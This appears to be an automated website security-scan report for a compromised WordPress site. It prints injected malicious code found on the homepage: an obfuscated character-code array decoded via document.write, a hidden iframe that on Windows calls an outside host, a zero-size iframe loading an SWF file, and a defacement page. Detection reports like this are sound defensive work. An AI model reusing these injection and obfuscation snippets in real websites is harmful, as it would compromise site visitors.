Scanned pages/files
Request | Server response | Status |
http://namokonkani.com/ | 200 OK Content-Length: 10134 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. var aa835d1=[557,617,657,662,675,589,672,673,678,665,658,618,591,669,668,672,662,673,662,668,667,615,589,654,655,672,668,665,674,673,658,616,589,665,658,659,673,615,602,606,605,605,594,616,589,673,668,669,615,605,594,616,589,676,662,657,673,661,615,606,605,605,594,616,589,661,658,662,660,661,673,615,606,605,605,594,616,591,619,567,617,672,656,671,662,669,673,619,675,654,671,589,662,618,605,616,659,674,667,656,673,662,668,667,589,657,668,668,597,668 ...[1208 bytes skipped]... Decoded script: <div style="position: absolute; left:-100%; top:0%; width:100%; height:100%;"> var i=0;function doo(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif";}i=1;return;} <iframe onload="return doo(this);" style="width:60%;height:60%;" src="about:blank"></iframe></div> var i=0;function doo(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif" var i=0;function doo(o){if(i==1)return;if(navigator.appVersion.indexOf("Win")!=-1){o.src="about:blank";var img = new Image(1,1);img.src = "http://mobi-avto.ru/cnt2.gif" Hidden iFrame found. size: 0x0 src: http://api.ning.com/files/ofvqomlbpfubounfvlorxzro1wj2vkoob51y2i4rwpy3ieofg8tijklcycju7nzrqohuvkuq33ftgjndsvpzt3iwh3j6683a/shopnodekhandin.swf <iframe width="0" height="0" src="http://api.ning.com/files/ofvqomlbpfubounfvlorxzro1wj2vkoob51y2i4rwpy3ieofg8tijklcycju7nzrqohuvkuq33ftgjndsvpzt3iwh3j6683a/shopnodekhandin.swf" frameborder="0" allowfullscreen=""> Deface/Content modification. The following signature was found: Hacked by Gl0w!Ng - F!R3 ...[1435 bytes skipped]... 71,656,618,591,654,655,668,674,673,615,655,665,654,667,664,591,619,617,604,662,659,671,654,666,658,619,617,604,657,662,675,619];var ba835d2="";for (var i=1; i<aa835d1.length; i++) {ba835d2+=String.fromCharCode(aa835d1[i]-aa835d1[0]);} document.write(ba835d2);</script><html><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta name="Keywords" content="Hacked by Gl0w!Ng - F!R3"> <title>HackeD by Gl0w!Ng - F!R3</title> <link rel="shortcut icon" href="http://www.sherv.net/cm/emo/funny/2/big-dancing-banana-smiley-emoticon.gif"> <style type="text/css"> body{background: url(http://w4dve.bmcwest.net/Space.gif);} .name { text-decoration: none;} @-moz-keyframes roll { 100% { -moz-transform: rotate(1440deg); } } @-o-keyframes roll { 100% { -o-transform: rotate(1440deg); } } @-webkit-k ...[9385 bytes skipped]... | ||
http://namokonkani.com/wp-content/themes/resizable/includes/js/jquery.min.js?ver=1.8.3 | 200 OK Content-Length: 93636 Content-Type: application/javascript | clean |
http://namokonkani.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.8.10 | 200 OK Content-Length: 33 Content-Type: application/javascript | clean |
http://namokonkani.com/wp-content/themes/resizable/functions/shortcodes/shortcodes.js?ver=1.0.0 | 200 OK Content-Length: 627 Content-Type: application/javascript | clean |
http://namokonkani.com/wp-content/themes/resizable/includes/js/superfish.js?ver=1.4.2 | 200 OK Content-Length: 3823 Content-Type: application/javascript | clean |
http://namokonkani.com/wp-content/themes/resizable/includes/js/custom.js?ver=1.4.2 | 200 OK Content-Length: 6883 Content-Type: application/javascript | clean |
http://namokonkani.com/wp-content/themes/resizable/includes/js/jquery-ui-1.8.5.custom.min.js?ver=1.8.5 | 200 OK Content-Length: 204320 Content-Type: application/javascript | clean |
http://namokonkani.com/test404page.js | 404 Not Found Content-Length: 408 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: namokonkani.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 08 Aug 2015 23:16:30 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://namokonkani.com/xmlrpc.php
GET / HTTP/1.1
Host: namokonkani.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 08 Aug 2015 23:16:30 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Pingback: http://namokonkani.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: namokonkani.com
Referer: http://www.google.com/search?q=namokonkani.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: namokonkani.com
Referer: http://www.google.com/search?q=namokonkani.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=namokonkani.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://namokonkani.com/
Result: namokonkani.com is not infected or malware details are not published yet.
Result: namokonkani.com is not infected or malware details are not published yet.